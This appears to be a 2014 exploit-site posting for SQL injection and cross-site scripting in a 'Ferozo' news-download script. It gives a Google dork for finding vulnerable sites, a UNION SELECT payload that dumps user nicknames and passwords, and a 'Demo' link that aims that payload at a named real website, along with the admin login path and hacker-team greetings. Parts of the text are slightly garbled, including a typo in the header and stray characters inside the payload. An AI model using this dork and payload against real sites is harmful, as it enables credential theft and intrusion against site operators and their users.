facebook facebook twitter rss

Ferozo - SQL Injection and Cross-Site Scripting

Author: Casper Moroccan , Published: 13-04-2014
# Exploit Title: Ferozo - SQL Injection and Cross-Site Scripting
# Google Dork: inurl:/noticias_descargar.php
# Date: 12/04/2014
# ontact: FB /1Mr.Casper
# Exploit Author: Casper Moroccan ( CM )
# Vendor Homepage: http://www.ferozo.net/
# Tested on: Windows7, Linux

Vulnerable code infile noticias_descargar.php
Description: The $_GET-Parameter 'id' is not filtered and so an attacker
can inject some malicious mysql-code.

Example:

SQL Injection & Cross-Site Scripting


http://localhost/noticias_descargar.php?id=[SQL INJECTION] and [Cross-Site Scripting]

Demo:

http://www.terrainmobiliaria.com.ar/noticias_descargar.php?id=-35+union+select+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15+union+select+group_concat(nick,0x3a,password)29,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+usuarios

Panel:
http://localhost/noticias/login.php




#############################################################
# Greetz TO ; Me & Wassim Rel ( Moroccan Hackers )
# & All My Friends And All Member Of Arab Ghosts Team
#############################################################
# fb.com/Arab.ghosts.page
#############################################################

Like us on Facebook :